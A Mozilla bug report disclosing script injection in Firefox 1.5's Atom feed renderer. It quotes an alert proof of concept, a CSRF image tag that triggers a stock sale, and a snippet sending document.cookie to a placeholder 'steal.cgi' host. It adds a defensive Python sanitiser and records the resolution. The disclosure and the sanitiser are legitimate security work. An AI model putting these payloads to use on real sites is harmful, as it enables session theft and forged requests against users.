Closed Bug 344681 Opened 18 years ago Closed 18 years ago

Atom renderer allows script execution

Categories

(Firefox Graveyard :: RSS Discovery and Preview, defect)

x86
Windows XP
defect
Not set
normal

Tracking

(Not tracked)

RESOLVED WORKSFORME

People

(Reporter: spilabs, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

Greetings,

While researching vulnerabilities in popular RSS & Atom Web Clients, SPI Labs has discovered multiple 
issues within your product 'Firefox 1.5.0.4'. The Atom renderer allows an attacker to inject and execute 
JavaScript in the 'DIV' tag. This allows for 'Remote' zone/context execution. 

Example:

<div class="info" xmlns="http://www.w3.org/1999/xhtml">
<script>alert('Feed Div Class Tag')</script>
</div>



When a feed containing this script is presented to the user it will execute. Extensive 
testing of each tag was not performed and other fields may also be affected. 



Remote Zone Risks
When a reader is vulnerable in the remote zone you are substantially limited in what you can do, 
however there are still many things that can be done such as: 


Cross-site request forgery
An attacker can utilize cross-site request forgery (CSRF or XSRF) attacks in various ways to 
make your machine send requests to a website in order to possibly execute commands. For example: 

<img src="http://www.mystocktradersite.com/transaction.asp?sell=google&buy=Microsoft&numshares=1000">


Potential to Launch Attacks
Since attackers can send requests to other sites, they could potentially trick your browser into carrying out 
Web-based attacks on their behalf. These attacks could cause Denial of Service Conditions in the remote site, 
or if the site is vulnerable, execute commands on it. Here an attacker's advantage is that client IP will be logged 
and any resulting investigation by the victim may lead to them instead of to the attacker. 


Common approaches to dealing with this issue are as follows

* Disabling script execution during the web feed presentation phase
* Stripping out < and > characters, or not converting &lt; and &gt; for presentation

We tried emailing the security email address and received no responses so we're posting this here. Please let us know if you have any additional questions. 


Regards,

- SPI Labs
spilabs@spidynamics.com

Reproducible: Always

Steps to Reproduce:
1. Create an Atom feed
2. Insert the following into your div element

<script>alert('Feed Div Class Tag')</script>

3. View the feed with Firefox, or a Mozilla based browser

Actual Results:  
JavaScript is executed. You strip it in some places but not all.

Expected Results:  
Common approaches to dealing with this issue are as follows
* Disabling script execution during the web feed presentation phase
* Stripping out < and > characters, or not converting &lt; and &gt; for presentation

I'm sorry to be dense, but where is the vulnerability? What can this script do that ordinary script in a web page cannot? Does it run with chrome privileges or something?

> We tried emailing the security email address and received no responses so 
> we're posting this here.

Which address, exactly?

Gerv

>> I'm sorry to be dense, but where is the vulnerability? What can this script
>> do that ordinary script in a web page cannot? Does it run with chrome
>> privileges or something?

As stated in the original posting we've discovered multiple applications affected by script injection in a web based feed, each having its own context limitations (Some even allowing file system access). Regarding chrome privileges this was not investigated and other concerns/issues may or may not exist. 

Let me address your question in two parts

#1
Web feed content may originate from blog postings, other feeds, P2P websites, or news entries. Depending on the site containing the feed an attacker may be able to steal cookies and send them to a third party host.

<script>
document.location='http://host/cgi-bin/steal.cgi' +document.cookie
</script>


Firefox already strips out/disables script injection attempts in various locations within an atom feed, however not within the 'div' tags. In the example above you may be thinking 'why would someone try stealing cookies from themselves?'. Feeds may be created from other feeds, or direct user input. An attacker may post a blog entry with script and the website itself filters the tag injection, however the feed portion of it doesn't. The same goes for feeds creating feeds from other feeds.


#2
Even with script execution disabled it is still possible to perform CSRF (http://en.wikipedia.org/wiki/CSRF) due to Atom's acceptance of HTML tags. There is no perfect solution regarding this 'ability'. A few suggestions:

* Disable HTML tag insertion: This unfortunately removes functionality
* Conversion of <>() tags to their HTML entities (Again this removes html formatting functionality)
* Creation of a new setting allowing the user to toggle between 'html and/or script on and off' on the feed renderer and have this be turned 
  'off' by default. 



>> We tried emailing the security email address and received no responses so 
>> we're posting this here.
>
> Which address, exactly?

security@mozilla.org 

Please let us know if you have any additional questions

spilabs@spidynamics.com
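Added example, not code from Mozilla or from SPI Labs: a small feed-preview sanitiser covering both points raised in this thread, the script injected inside the XHTML div of the original report and the CSRF-via-HTML concern in the follow-up. It implements the two mitigations the reporter lists (drop script during presentation; leave &lt; and &gt; unconverted) plus the suggested user toggle, here modelled as the hypothetical parameters html_enabled and allow_requests. The entry XML, the use of Python's xml.etree and the parameter names are my assumptions; the payloads in the sample are the ones quoted in the bug.

```python
"""Sanitise an Atom entry's content before a feed-preview pane renders it.
Added example; the Atom entry below is constructed from the payloads quoted
in the bug and is not a real feed."""
import copy
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

ATOM = "http://www.w3.org/2005/Atom"
XHTML = "http://www.w3.org/1999/xhtml"
ET.register_namespace("", XHTML)  # serialise the div with a default xmlns

# Elements that run code, and elements whose mere presence makes the reader's
# browser send a request (the CSRF vector the report describes).
SCRIPT_TAGS = {"script", "object", "embed", "applet"}
REQUEST_TAGS = {"img", "iframe", "frame", "link", "audio", "video", "source",
                "form", "input"}
URL_ATTRS = {"href", "src", "action", "formaction"}

# Constructed sample: an XHTML payload combining the script-in-div and the
# image-based CSRF examples from the thread, plus an event handler attribute.
SAMPLE_ENTRY = f"""<entry xmlns="{ATOM}">
  <title>test</title>
  <content type="xhtml">
    <div class="info" xmlns="{XHTML}">
      <p>Hello <b onmouseover="alert(1)">reader</b></p>
      <script>alert('Feed Div Class Tag')</script>
      <img src="http://www.mystocktradersite.com/transaction.asp?sell=google&amp;buy=Microsoft&amp;numshares=1000"/>
      <a href="javascript:alert(1)">link</a>
    </div>
  </content>
</entry>"""

# Constructed sample: type="html" carries escaped markup as a string.
SAMPLE_HTML_ENTRY = f"""<entry xmlns="{ATOM}">
  <content type="html">&lt;script&gt;alert(1)&lt;/script&gt;</content>
</entry>"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag/attribute names."""
    return tag.rsplit("}", 1)[-1].lower()


def _unsafe_attr(name, value):
    """True for event handlers, inline style, and script-scheme URLs."""
    n = _local(name)
    if n.startswith("on") or n == "style":
        return True
    if n in URL_ATTRS:
        # drop whitespace/control characters sprinkled in to hide the scheme
        v = "".join(ch for ch in value if ord(ch) > 32)
        scheme = v.split(":", 1)[0].lower() if ":" in v else ""
        return scheme in {"javascript", "vbscript", "data"}
    return False


def _scrub(elem, allow_requests):
    """Recursively remove unsafe elements and attributes in place."""
    for child in list(elem):
        name = _local(child.tag)
        if name in SCRIPT_TAGS or (not allow_requests and name in REQUEST_TAGS):
            # Drop the element but keep its tail text so surrounding prose survives.
            idx = list(elem).index(child)
            tail = child.tail or ""
            if idx == 0:
                elem.text = (elem.text or "") + tail
            else:
                prev = elem[idx - 1]
                prev.tail = (prev.tail or "") + tail
            elem.remove(child)
            continue
        for attr in list(child.attrib):
            if _unsafe_attr(attr, child.attrib[attr]):
                del child.attrib[attr]
        _scrub(child, allow_requests)


def sanitize_xhtml(div, allow_requests=False):
    """Return a sanitised deep copy of an XHTML element tree."""
    div = copy.deepcopy(div)
    _scrub(div, allow_requests)
    return div


def render_entry_content(entry_xml, html_enabled=True, allow_requests=False):
    """Return the string a preview pane may show for one Atom <entry>.
    html_enabled=False is the 'HTML off' default the report proposes: the
    content is shown as text, with < and > left escaped."""
    entry = ET.fromstring(entry_xml)
    content = entry.find(f"{{{ATOM}}}content")
    if content is None:
        return ""
    if content.get("type") == "xhtml":
        div = content.find(f"{{{XHTML}}}div")
        if div is None:
            return ""
        if not html_enabled:
            return escape("".join(div.itertext()))
        return ET.tostring(sanitize_xhtml(div, allow_requests), encoding="unicode")
    # type="html" or "text": a string payload; escape it so tags render literally
    return escape(content.text or "")


if __name__ == "__main__":
    print(render_entry_content(SAMPLE_ENTRY))
    print(render_entry_content(SAMPLE_ENTRY, html_enabled=False))
```

With the defaults the script element, the event handler, the javascript: href and the auto-requesting img are all removed while the prose and its formatting survive; allow_requests=True keeps the img (restoring formatting at the cost of the CSRF exposure the follow-up describes), and html_enabled=False gives the plain-text rendering with nothing converted back into tags.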

In Firefox 1.5 these were treated as XML, and scripts are valid in XML. In Firefox 2 these are detected as feeds and no scripts are run.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → WORKSFORME
Product: Firefox → Firefox Graveyard